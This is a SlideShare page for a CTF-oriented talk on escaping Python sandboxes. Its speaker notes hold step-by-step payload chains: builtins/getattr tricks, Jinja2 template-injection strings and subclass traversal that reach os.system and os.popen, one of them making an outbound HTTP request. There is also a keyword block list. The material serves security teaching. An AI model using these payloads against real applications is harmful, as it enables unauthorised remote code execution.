Escaping the python sandbox
•Transferir como PPTX, PDF•
0 gostou•3,286 visualizações
There’s two things I really like: Capture the flag competitions and Python. Fortunately, I have found out that there are challenges that combine both. In my session I will talk about challenges from 3 different CTF competitions and about the upgraded challenges I wrote from PwCTF. I will explain the difficulties of creating Python Sandbox and I will show the security issues in the wild. Things you will learn from my session: * Why Python Sandbox is a bad idea * How to exploit Python Sandbox using knowledge of Python language to execute code remotely * Why it’s hard to protect Python from code execution using Web Application Firewall * At the end of the session you will get 3 pySandbox challenges to solve in order to check your abilities
Recomendados
Recomendados
Mais conteúdo relacionado
Mais procurados
Mais procurados (20)
Mais de Tomer Zait
Último
Último (20)
Escaping the python sandbox
- 2. $ • • • • • @realgam3 • https://linkedin.com/in/realgam3 • https://github.com/realgam3
- 11. Objects
- 24. from __future__ import print_function targets = __builtins__.__dict__.keys() targets.remove('raw_input') targets.remove('print') for x in targets: del __builtins__.__dict__[x]
- 25. banned = [ "import", "exec", "eval", "pickle", "os", "subprocess", "kevin sucks", "input", "banned", "cry sum more", "sys" ]
- 27. https://Links • http://pyconil2018.realgame.co.il • https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90- 5-PySandbox.pdf • https://github.com/vstinner/pysandbox • https://nvisium.com/blog/2016/03/09/exploring-ssti-in- flask-jinja2.html
- 28. If You Really Like CTF Challenges
Notas do Editor
- My name is Tomer Zait and I'm a security researcher on F5 Networks. I’m practical software engineer and offensive security expert. I Love CTF'S and writing open source software's. By The Way Your are welcome to contribute code, or follow me in twitter or github.
- Secure Pyshell: print('') print("") print(".") print(open) print(__file__) print(open(__file__)) print(getattr(open(__file__),"read")) print(getattr(open(__file__),"read")()) print(__builtins__) print(dir(__builtins__)) print(getattr(__builtins__,"vars")) print(getattr(__builtins__,"va"+"rs")) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()["os"]) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
- Zumbo 3: {{1+1}} {{request.environ}} {{config}} {%set a = 1+2%}{{a}} {{config.__class__.__init__.__globals__}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} {{[].__class__.__base__.__subclasses__()}} {{[].__class__.__base__.__subclasses__()[351]}} {%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}} http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
- print("".__class__.__mro__) print("".__class__.__mro__[-1].__subclasses__()) print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage')) print("".__class__.__mro__[-1].__subclasses__()[59].__init__) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"]) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')
- Ask “What are the actual alternatives that omer simpson has”?